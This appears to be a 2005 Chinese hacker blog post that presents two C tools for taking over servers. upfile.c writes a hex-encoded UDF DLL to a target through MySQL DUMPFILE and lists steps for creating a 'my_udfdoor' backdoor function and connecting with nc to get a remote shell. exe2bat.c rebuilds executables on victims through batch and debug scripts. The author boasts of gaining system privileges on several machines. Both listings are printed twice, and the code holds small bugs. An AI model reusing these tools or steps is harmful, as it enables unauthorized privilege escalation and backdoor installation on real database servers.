2005-11-18 18:57:48 by: h4x0r
MYSQL上传二进制文件的利用工具
看了黑防第7期的从MYSQL到系统权限的文章,里面作者写了个利用MYSQL上传二进制文件的利用工具,并给出了程序的源代码,俺按照他的方法,试验了几台机器都成功得到了系统权限。但是那个工具似乎写得不是很好,要先dir出文件的大小,然后在用重定向符>写入那个脚本,感觉好费尽,其实这些都可以用编程实现在程序内部的,于是俺就也写了个利用工具,比勇哥的感觉要好^_^,原程序如下,比较简单:
upfile.c
由于程序比较简单,所以没加注释。其实我们还可以融会贯通,把上面的代码稍微改下,就可以写一个
exe2bat的程序,原理就不详细说了,还是直接看我的代码:
exe2bat.c
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=150
upfile.c
#include <stdio.h>
#include <string.h>
#define Max 600
char ver[Max]="\n\t\tWirtten by W.Z.T <Don't be lazy,Just go ahead>\n\n\t\t\tQQ:0x3731353739393132\n\n";
void help(void);
void upfile(char *,char *,char *);
int main(int argc,char **argv)
{
if(argc==1)
{
help();
}
upfile(argv[1],argv[2],argv[3]);
return 0;
}
void help(void)
{
int i;
for(i=0;i<strlen(ver);i++)
{
sleep(15);
printf("%c",ver[i]);
}
printf("upfile.exe <localfile> <remotefile> <script.txt>\n\n");
printf("exp:\n\n");
printf("upfile.exe my_udf.dll c:\\\\my_udf.dll sgl.txt\n");
exit(0);
}
void upfile(char *line,char *line1,char *line2)
{
FILE *fp_s,*fp_t;
char *use[7]={"\n#then,do as follows:\n\n",
"#mysql -h remoteip -uroot -p\n",
"#mysql>\\. script.txt\n",
"#create FUNCTION my_udfdoor RETURNS STRING SONAME \'",
"\';\n",
"#select my_udfdoor(\'\');\n\n",
"#nc -vv remoteip 3306/fuck\n"};
char ch;
long lenth;
int i=0,j;
if((fp_s=fopen(line,"rb"))==NULL)
{
printf("Can't open the file %s.\n",line);
exit(0);
}
if((fp_t=fopen(line2,"w+"))==NULL)
{
printf("Can't open the file %s.\n",line2);
exit(0);
}
fseek(fp_s,0,SEEK_END);
lenth=ftell(fp_s);
fseek(fp_s,0,SEEK_SET);
printf("\n#%s has %ld bytes,0x%x\n",line1,lenth,lenth);
fputs("set @a = concat(\'\',0x",fp_t);
while(i<lenth)
{
ch = fgetc(fp_s);
if(( unsigned char ) ch<= ( unsigned char )15)
fprintf(fp_t,"0",ch);
fprintf(fp_t,"%x",(unsigned char)ch);
i++;
}
fputs(");\n",fp_t);
fputs("use mysql;\n",fp_t);
fputs("create table sgl(data LONGBLOB);\n",fp_t);
fputs("insert into sgl values(\"\");\n",fp_t);
fputs("update sgl set data = @a;\n",fp_t);
fputs("select data from sgl into DUMPFILE \'",fp_t);
fputs(line1,fp_t);
fputs("\';\n",fp_t);
fputs("drop table sgl;\n",fp_t);
fclose(fp_s);
fclose(fp_t);
for(i=0;i<7;i++)
{
if(i==4)
printf("%s",line1);
for(j=0;j<strlen(use[i]);j++)
{
sleep(20);
printf("%c",use[i][j]);
}
}
printf("done.good luck.\n\n");
}
#include <string.h>
#define Max 600
char ver[Max]="\n\t\tWirtten by W.Z.T <Don't be lazy,Just go ahead>\n\n\t\t\tQQ:0x3731353739393132\n\n";
void help(void);
void upfile(char *,char *,char *);
int main(int argc,char **argv)
{
if(argc==1)
{
help();
}
upfile(argv[1],argv[2],argv[3]);
return 0;
}
void help(void)
{
int i;
for(i=0;i<strlen(ver);i++)
{
sleep(15);
printf("%c",ver[i]);
}
printf("upfile.exe <localfile> <remotefile> <script.txt>\n\n");
printf("exp:\n\n");
printf("upfile.exe my_udf.dll c:\\\\my_udf.dll sgl.txt\n");
exit(0);
}
void upfile(char *line,char *line1,char *line2)
{
FILE *fp_s,*fp_t;
char *use[7]={"\n#then,do as follows:\n\n",
"#mysql -h remoteip -uroot -p\n",
"#mysql>\\. script.txt\n",
"#create FUNCTION my_udfdoor RETURNS STRING SONAME \'",
"\';\n",
"#select my_udfdoor(\'\');\n\n",
"#nc -vv remoteip 3306/fuck\n"};
char ch;
long lenth;
int i=0,j;
if((fp_s=fopen(line,"rb"))==NULL)
{
printf("Can't open the file %s.\n",line);
exit(0);
}
if((fp_t=fopen(line2,"w+"))==NULL)
{
printf("Can't open the file %s.\n",line2);
exit(0);
}
fseek(fp_s,0,SEEK_END);
lenth=ftell(fp_s);
fseek(fp_s,0,SEEK_SET);
printf("\n#%s has %ld bytes,0x%x\n",line1,lenth,lenth);
fputs("set @a = concat(\'\',0x",fp_t);
while(i<lenth)
{
ch = fgetc(fp_s);
if(( unsigned char ) ch<= ( unsigned char )15)
fprintf(fp_t,"0",ch);
fprintf(fp_t,"%x",(unsigned char)ch);
i++;
}
fputs(");\n",fp_t);
fputs("use mysql;\n",fp_t);
fputs("create table sgl(data LONGBLOB);\n",fp_t);
fputs("insert into sgl values(\"\");\n",fp_t);
fputs("update sgl set data = @a;\n",fp_t);
fputs("select data from sgl into DUMPFILE \'",fp_t);
fputs(line1,fp_t);
fputs("\';\n",fp_t);
fputs("drop table sgl;\n",fp_t);
fclose(fp_s);
fclose(fp_t);
for(i=0;i<7;i++)
{
if(i==4)
printf("%s",line1);
for(j=0;j<strlen(use[i]);j++)
{
sleep(20);
printf("%c",use[i][j]);
}
}
printf("done.good luck.\n\n");
}
由于程序比较简单,所以没加注释。其实我们还可以融会贯通,把上面的代码稍微改下,就可以写一个
exe2bat的程序,原理就不详细说了,还是直接看我的代码:
exe2bat.c
#include <stdio.h>
#include <string.h>
#define M 65279
char *msg="GOOD_LUCK";
void help(void);
char exe2bat(char *,char *);
int main(int argc,char **argv)
{
if(argc==1)
{
help();
}
exe2bat(argv[1],argv[2]);
return 0;
}
void help()
{
printf("\nWritten by W.Z.T <==Don't be lazy,Just go ahead==>\n\n");
printf("exe2bat.exe input.exe output.bat\n");
exit(0);
}
char exe2bat(char *s_f,char *t_f)
{
FILE *s_fp,*t_fp;
char *s_fe=s_f;
char *t_fe=t_f;
char c;
char ch;
long lenth;
int i=1,k=256;
if((s_fp=fopen(s_fe,"rb"))==NULL)
{
printf("Can't open the file %s.\n",s_fe);
exit(0);
}
if((t_fp=fopen(t_fe,"w+"))==NULL)
{
printf("Can't create the file %s.\n",t_fe);
exit(0);
}
fseek(s_fp,0,SEEK_END);
lenth=ftell(s_fp);
fseek(s_fp,0,SEEK_SET);
printf("%ld,%x\n",lenth,lenth);
if(lenth>=M)
{
printf("The exe file's lenth must be <= M-1\n");
exit(0);
}
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
while(!feof(s_fp))
{
k++;
c = fgetc(s_fp);
if(( unsigned char ) c<= ( unsigned char )15)
fprintf(t_fp,"0",c);
fprintf(t_fp,"%x ",(unsigned char)c);
if(i%16==0)
{
fputs(">>sgl\n",t_fp);
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
}
i++;
}
if(lenth%16!=0)
fputs(">>%tmp%\\sgl\n",t_fp);
fputs("@echo rcx>>sgl\n",t_fp);
fprintf(t_fp,"@echo %x>>sgl\n",lenth,t_fp);
fputs("@echo n tthacker>>sgl\n",t_fp);
fputs("@echo w>>sgl\n",t_fp);
fputs("@echo q>>sgl\n",t_fp);
fputs("@debug<sgl>nul\n",t_fp);
fputs("@del sgl\n",t_fp);
fputs("@ren tthacker ",t_fp);
fprintf(t_fp,"%s>>sgl\n",s_fe);
fputs("@",t_fp);
fprintf(t_fp,"%s",s_fe);
fclose(s_fp);
fclose(t_fp);
puts(msg);
return 0;
}
#include <string.h>
#define M 65279
char *msg="GOOD_LUCK";
void help(void);
char exe2bat(char *,char *);
int main(int argc,char **argv)
{
if(argc==1)
{
help();
}
exe2bat(argv[1],argv[2]);
return 0;
}
void help()
{
printf("\nWritten by W.Z.T <==Don't be lazy,Just go ahead==>\n\n");
printf("exe2bat.exe input.exe output.bat\n");
exit(0);
}
char exe2bat(char *s_f,char *t_f)
{
FILE *s_fp,*t_fp;
char *s_fe=s_f;
char *t_fe=t_f;
char c;
char ch;
long lenth;
int i=1,k=256;
if((s_fp=fopen(s_fe,"rb"))==NULL)
{
printf("Can't open the file %s.\n",s_fe);
exit(0);
}
if((t_fp=fopen(t_fe,"w+"))==NULL)
{
printf("Can't create the file %s.\n",t_fe);
exit(0);
}
fseek(s_fp,0,SEEK_END);
lenth=ftell(s_fp);
fseek(s_fp,0,SEEK_SET);
printf("%ld,%x\n",lenth,lenth);
if(lenth>=M)
{
printf("The exe file's lenth must be <= M-1\n");
exit(0);
}
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
while(!feof(s_fp))
{
k++;
c = fgetc(s_fp);
if(( unsigned char ) c<= ( unsigned char )15)
fprintf(t_fp,"0",c);
fprintf(t_fp,"%x ",(unsigned char)c);
if(i%16==0)
{
fputs(">>sgl\n",t_fp);
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
}
i++;
}
if(lenth%16!=0)
fputs(">>%tmp%\\sgl\n",t_fp);
fputs("@echo rcx>>sgl\n",t_fp);
fprintf(t_fp,"@echo %x>>sgl\n",lenth,t_fp);
fputs("@echo n tthacker>>sgl\n",t_fp);
fputs("@echo w>>sgl\n",t_fp);
fputs("@echo q>>sgl\n",t_fp);
fputs("@debug<sgl>nul\n",t_fp);
fputs("@del sgl\n",t_fp);
fputs("@ren tthacker ",t_fp);
fprintf(t_fp,"%s>>sgl\n",s_fe);
fputs("@",t_fp);
fprintf(t_fp,"%s",s_fe);
fclose(s_fp);
fclose(t_fp);
puts(msg);
return 0;
}
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=150
There is no comment on this article.
